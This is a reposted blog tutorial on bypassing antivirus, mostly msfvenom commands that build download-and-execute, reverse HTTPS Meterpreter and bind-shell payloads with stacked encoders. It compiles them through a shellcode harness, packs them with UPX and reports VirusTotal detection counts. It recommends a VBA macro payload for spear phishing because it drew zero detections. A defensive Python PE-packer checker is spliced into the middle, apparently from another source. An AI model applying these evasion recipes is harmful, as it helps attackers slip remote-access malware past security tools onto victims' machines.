Using Shellcode execution as a possible antivirus bypass technique.
Published: 2019-06-14


Ok, first off, we need to create our malicious "shellcode payload"... I have a few examples below of some possible payloads we could be using.

1. Download and execute.

msfvenom -p windows/download_exec URL=http://www.example.com/malware.exe -e x86/shikata_ga_nai -i 5 -e x86/countdown -i 3 -e x86/call4_dword_xor -i 5 -e x86/jmp_call_additive -i 5 -f c

2. Reverse Meterpreter HTTPS shell

msfvenom -p windows/meterpreter/reverse_https LHOST=127.0.0.1 LPORT=443 -e x86/shikata_ga_nai -i 5 -e x86/countdown -i 3 -e x86/call4_dword_xor -i 5 -e x86/jmp_call_additive -i 5 -f c

3. Standard Bind Shell

msfvenom -p windows/shell_bind_tcp LPORT=31337 -e x86/shikata_ga_nai -i 5 -e x86/countdown -i 3 -e x86/call4_dword_xor -i 5 -e x86/jmp_call_additive -i 5 -f c

These are the three payloads I will be testing. The encoding I chose at random and just went with the encoding that "felt right". I will not be running them, just uploading them to VirusTotal to show you them compared to their .exe outputs. Bin size (before and after UPX) and AV detections will be taken as the final "idea of how awesome they are".

Step One: Download and Execute Payload.

Here are the commands we will be using to make our "native metasploit exe" version (direct MSFVENOM output) of the dl/exec payload.

msfvenom -p windows/download_exec URL=http://www.example.com/malware.exe -e x86/shikata_ga_nai -i 5 -e x86/countdown -i 3 -e x86/call4_dword_xor -i 5 -e x86/jmp_call_additive -i 5 -f exe > /tmp/dlexec.exe

So, we have our binary, and we upload it to the VirusTotal scanning service to see how many detections we get...

Filename: dlexec.exe

Filesize: 72.1 KB
MD5 Hash: aeace18d84af11640a219b2b557ee8ee
Packing: No UPX used.
Detections: 32/42
(Detections are at time of scan)
Link: https://www.virustotal.com/file/9e5c565e48de976e14d316db667cf22f3b50671f47e38ff0864775e5888ee51b/analysis/1332350345/

Next up we UPX it with this command: upx -9 dlexec.exe

Filesize: 47.0KB

MD5 Hash: ac4375e1a7fe474548dd798bd60f8f04
Detections: 27/43
(Detections are at time of scan)
Link: https://www.virustotal.com/file/fef15aee195c8bdcbbee3cbbc91fab36791a172096f06152e24a9b1862d1405c/analysis/1332350651/

Now, we re-do the whole thing with the ShellCodeExec method, which should be detected a LOT less.

First, we create our shellcode:

msfvenom -p windows/download_exec URL=http://www.example.com/malware.exe -e x86/shikata_ga_nai -i 5 -e x86/countdown -i 3 -e x86/call4_dword_xor -i 5 -e x86/jmp_call_additive -i 5 -f c

Now, we pop it into our shellcode-harness...

And compile: i586-mingw32msvc-gcc meta.c -o dlcrypt.exe

Filename: dlcrypt.exe

Filesize: 20.1KB
MD5 Hash: f873ab0d718dbd61b7987c7467ae589c
Packing: No UPX used.
Detections: 14 / 43
(Detections are at time of scan)
Link: https://www.virustotal.com/file/38f34eae9f19c401f61406d80d47e9280fa689b3abcfdfb17571849f69d0de17/analysis/1332351185/

As you can see, it is a far smaller file with a lot fewer detections. Let's UPX it and see what happens next...

Filename: dlcrypt.exe

Filesize: 14.1 KB
MD5 Hash: 03d634dde3d1e573d99776009e8567f5
Packing: UPX used.
Detections: 18 / 43
(Detections are at time of scan)
Link: https://www.virustotal.com/file/fc6e15bc19fc1f1bfaec9aeac8f2ede308e3d78b3e4efe90ab3b0804d8bafd4d/analysis/1332351313/

It would appear UPX is counterproductive to bypassing AV (packers normally are...) so tomorrow I will try the second payload, my FAVOURITE one, the Meterpreter Reverse HTTPS payload.
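The flip side of that packer observation, as an added example that is not part of the original post: a small Python checker that walks a PE's section table and flags the two things a scanner keys on first, UPX-named sections and sections whose byte entropy sits near 8 bits/byte. The PE fixture is constructed inline so it runs offline; the section-name prefix and the 7.0 entropy cutoff are assumed heuristics, not values from the post.

```python
import math
import struct
from collections import Counter

UPX_SECTION_PREFIX = b"UPX"    # assumed indicator: stock UPX names its sections UPX0/UPX1/UPX2
HIGH_ENTROPY_THRESHOLD = 7.0   # assumed cutoff in bits/byte; compressed or encrypted data sits near 8.0

def shannon_entropy(data: bytes) -> float:
    # Shannon entropy in bits per byte; 0.0 for empty input
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values()) if n else 0.0

def parse_sections(pe: bytes):
    """Walk the PE section table; return [(name, raw_bytes_on_disk)]."""
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0] if pe[:2] == b"MZ" and len(pe) >= 0x40 else -1
    if e_lfanew < 0 or pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    coff = e_lfanew + 4                          # IMAGE_FILE_HEADER follows the signature
    _, num_sections, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", pe, coff)
    table = coff + 20 + opt_size                 # section table follows the optional header
    rows = [struct.unpack_from("<8sIIII", pe, table + 40 * i) for i in range(num_sections)]
    return [(name.rstrip(b"\0"), pe[ptr:ptr + size]) for name, _, _, size, ptr in rows]

def packer_indicators(pe: bytes) -> dict:
    """Two cheap packing indicators: UPX-style section names and near-8-bit section entropy."""
    hits = {"upx_sections": [], "high_entropy_sections": []}
    for name, raw in parse_sections(pe):
        label = name.decode("ascii", "replace")
        if name.startswith(UPX_SECTION_PREFIX):
            hits["upx_sections"].append(label)
        if raw and shannon_entropy(raw) >= HIGH_ENTROPY_THRESHOLD:
            hits["high_entropy_sections"].append(label)   # also catches renamed sections
    return hits

def build_fake_pe(sections) -> bytes:
    """Constructed fixture: a minimal PE-shaped blob (headers, section table, raw data); not executable."""
    opt_size = 224                                # PE32 optional header size, zero-filled here
    raw_off = 0x40 + 4 + 20 + opt_size + 40 * len(sections)
    hdr = bytearray(b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40))           # e_lfanew = 0x40
    hdr += b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, opt_size, 0x102) + b"\0" * opt_size
    body = bytearray()
    for name, raw in sections:
        hdr += struct.pack("<8sIIIIIIHHI", name, len(raw), 0, len(raw), raw_off + len(body), 0, 0, 0, 0, 0)
        body += raw
    return bytes(hdr + body)

# Constructed samples: UPX layout (UPX0 virtual-only, UPX1 holds the compressed image) vs. a plain layout.
UPX_SAMPLE = build_fake_pe([(b"UPX0", b""), (b"UPX1", bytes(range(256)) * 16), (b".rsrc", b"VS_VERSION_INFO\0" * 64)])
PLAIN_SAMPLE = build_fake_pe([(b".text", b"\x55\x8b\xec\x90\xc3" * 400), (b".data", b"Hello, world\0" * 100)])
```

The name check alone is trivially defeated by renaming sections, which is why the entropy check runs alongside it; on a real sample, read the file and pass its bytes to `packer_indicators`.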

Ok. Reverse HTTPS payload time!

Here are the commands we will be using to make our "native metasploit exe" version (direct MSFVENOM output) of the reverse https meterpreter payload.

msfvenom -p windows/meterpreter/reverse_https LHOST=127.0.0.1 LPORT=443 -e x86/shikata_ga_nai -i 5 -e x86/countdown -i 3 -e x86/call4_dword_xor -i 5 -e x86/jmp_call_additive -i 5 -f exe > /tmp/payload.exe

So, we have our binary, and we upload it to the VirusTotal scanning service to see how many detections we get...

Filename: payload.exe

Filesize: 72.1 KB
MD5 Hash: dd347fcf69bdbc33f1ea2b318cf4831c
Packing: No UPX used.
Detections: 30 / 43
(Detections are at time of scan)
Link: https://www.virustotal.com/file/6a7cbf711f24a7ff1ae14a83ff193b4c17b3043516d5bd7366a7db736c793b8f/analysis/1332423872/

Next up, we UPX

Filename: payload.exe

Filesize: 47.0 KB
MD5 Hash: 5cdf49f9df5701f76b9ee9f8917e6d05
Packing: UPX used.
Detections: 26 / 42
(Detections are at time of scan)
Link: https://www.virustotal.com/file/fc11cfbcbd5d13a5acce3e4fb82f93133bbc62e8df6d00ff8478faa3bdf1e113/analysis/1332424184/

As you can see, UPX had a positive effect this time. I then noticed something bloody amazing in the MSFVENOM manual.

exe-small output.

msfvenom -p windows/meterpreter/reverse_https LHOST=127.0.0.1 LPORT=443 -f exe-small > /tmp/payload.exe

No encoding used this time BTW.

Filename: payload.exe

Filesize: 4.5 KB
MD5 Hash: 0bd184dd04ff1015ffbce7e792c2c598
Packing: None
Detections: 13 / 43
Link: https://www.virustotal.com/file/bd9d1d6228e0aad08f3bb885bbf1d8f8e4c78b4530f8dd5b82da96e52b6a5c3f/analysis/1332424669/

So, let's add some encoding and see what happens...

##

msfvenom -p windows/meterpreter/reverse_https LHOST=127.0.0.1 LPORT=443 -e x86/shikata_ga_nai -i 5 -e x86/countdown -i 3 -e x86/call4_dword_xor -i 5 -e x86/jmp_call_additive -i 5 -f exe-small > 1.exe

https://www.virustotal.com/file/e946566e5c0162c4090f126cb12077926433f66c62c9354fa730242ade663b3c/analysis/1332427945/

More detected? WTF? Fine. Let's move on...

##

Now, I started looking into alternative outputs... And came up with this.

msfvenom -p windows/meterpreter/reverse_https LHOST=127.0.0.1 LPORT=443 -f vba-exe > /tmp/vba.exe

Filename: vba.exe

Filesize: 290.2 KB
MD5 Hash: aedde86916de88b856b22c6e384901bb
Packing: None
Detections: 0 / 42
Link: https://www.virustotal.com/file/66e496f92029e31ab2c9df7ba886502efb3fa471d5451828df7c99d56f71dc56/analysis/1332427482/

This is a MS Office Macro payload. Simply open it in a text editor and follow the instructions...

Final Notes: The MS Office Macro payload is likely the most promising of the lot, as it can be directly embedded into a MS-Word document for spear phishing attacks, and seems to auto bypass things like AV.

Now for ONE LAST TRY: Objdump Pwnage.

root@shinigami:/tmp# msfvenom -p windows/meterpreter/reverse_https LHOST=127.0.0.1 LPORT=443 -f exe-small > /tmp/micro.exe

root@shinigami:/tmp# wget http://www.projectshellcode.com/downloads/xxd-shellcode.sh
root@shinigami:/tmp# chmod +x xxd-shellcode.sh
root@shinigami:/tmp# ./xxd-shellcode.sh micro.exe > sc.txt
### Here is where you pop the contents of sc.txt into the shellcode test harness as before ###
root@shinigami:/tmp# i586-mingw32msvc-gcc sc.c -o helloshell.exe

So now we scan our new binary and see how "bypassing" it is. We can take this further BTW...

MD5: 7642f0914ebbe62ddc8d64ffe7d52783

File size: 24.1 KB ( 24650 bytes )
File name: helloshell.exe
File type: Win32 EXE
Detection ratio: 10 / 43
Link: https://www.virustotal.com/file/90add485b7df79d83588412ce59d76707c27914a2d0d86d731669670c4f6bac3/analysis/1332429280/

Next: We UPX it...

MD5: 963253a72210eb8bd7155137713112ba

File size: 16.6 KB ( 16970 bytes )
File name: helloshell.exe
File type: Win32 EXE
Detection ratio: 10 / 41
Link: https://www.virustotal.com/file/6ca78ead1a8ef1c910f921eeab21af48a021db13872a3ad64a6ec6f8c2e228cb/analysis/1332429381/

So then I take this variant, pretend it is micro.exe, and re-encode it...

Result?

PRE UPX:

MD5: a34d634236388762de0801acdd587cc9
File size: 36.1 KB ( 36938 bytes )
File name: helloshell2.exe
File type: Win32 EXE
Detection ratio: 5 / 43
Link: https://www.virustotal.com/file/bc2e51bca3b3895bf59607ab1dbe1bbbfe6fff494642556660d30cf8dae1045e/analysis/1332429607/

POST UPX:

Detections: 10 / 42
Link: https://www.virustotal.com/file/726ced89801acc785f9360d595e7de390c3c19dafeecffcb2db14eb2d00e94b6/analysis/1332429713/

root@shinigami:/tmp# exit

I went up to 10 iterations with no real advantage, but perhaps alternating extra encodings (shikata_ga_nai) may help. I will investigate this later.

~infodox

Reposted from: https://www.cnblogs.com/heycomputer/articles/10998449.html
